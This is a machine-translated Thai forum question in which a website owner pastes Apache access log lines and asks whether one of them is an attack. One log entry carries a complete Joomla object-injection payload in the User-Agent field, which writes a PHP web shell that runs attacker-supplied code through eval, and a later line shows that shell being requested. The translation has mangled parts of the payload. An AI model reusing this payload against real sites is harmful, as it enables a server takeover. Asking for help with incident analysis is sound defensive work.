รายการบันทึกการเข้าถึง Apache บนไซต์ของฉันมักจะเป็นรายการนี้:
207.46.13.174 - - [31 / Oct / 2016: 10: 18: 55 +0100] "รับ / ติดต่อ HTTP / 1.1" 200 256 "-" "Mozilla / 5.0 (เข้ากันได้; bingbot / 2.0; + http: // www .bing.com / bingbot.htm) "0.607 นางสาว 10.10.36.125:104 0.607
เพื่อให้คุณสามารถเห็นฟิลด์ตัวแทนผู้ใช้ที่นั่น แต่วันนี้ฉันยังพบฟิลด์ตัวแทนผู้ใช้ที่ใช้สิ่งนี้:
62.210.162.42 - - [31 / Oct / 2016: 11: 24: 19 +0100] "GET / HTTP / 1.1" 200 399 "-" "} __ ทดสอบ | O: 21:" JDatabaseDriverMysqli ": 3: {s: 2 "เอฟซี"; O: 17: "JSimplepieFactory": 0: {} s: 21: "\ 0 \ 0 \ 0disconnectHandlers"; a: 1: {i: 0; a: 2: {i: 0; O: 9: "SimplePie": 5: {s: 8: "sanitize"; O: 20: "JDatabaseDriverMysql": 0: {} s: 8: "FEED_URL"; s: 242: "file_put_contents ($ _ SERVER [" DOCUMENT_ROOT" ] .chr (47). "sqlconfigbak.php", "| = | \ x3C" .chr (63). "php \ x24mujj = \ x24_POST ['z']; ถ้า (\ x24mujj! = '') {\ ' x24xsser = base64_decode (\ x24_POST [ 'z0']); @ EVAL (\ "\\\ x24safedg = \ x24xsser; \");} "); JFactory :: getConfig (); ทางออก;"; s: 19:" cache_name_function "; s: 6:" ยืนยัน "; s: 5:" แคช "; b: 1; s: 11:" cache_class "; O: 20:"JDatabaseDriverMysql ": 0: {}} i: 1; s: 4:" init ";}} s: 13:" \ 0 \ 0 \ 0 เชื่อมต่อโครงข่าย "; b: 1;} ~ Ů" 0.304 BYPASS 10.10.36.125:104 0.304
นี่เป็นการโจมตีหรือไม่? รายการบันทึกถัดไปดูเหมือนจะมีการดึงไฟล์ (รหัส 200) ที่sqlconfigbak.phpกล่าวถึงในสคริปต์สำเร็จ แม้ว่าฉันจะไม่พบไฟล์ในระบบไฟล์:
62.210.162.42 - - [31 / ต.ค. / 2559: 11: 24: 20 +0100] "GET //sqlconfigbak.php HTTP / 1.1" 200 399 "http://www.googlebot.com/bot.html" "Mozilla /5.0 (ใช้งานได้; Googlebot / 2.1; + http: //www.google.com/bot.html) "0.244 BYPASS 10.10.36.125:104 0.244
ได้โปรดเกิดอะไรขึ้นที่นี่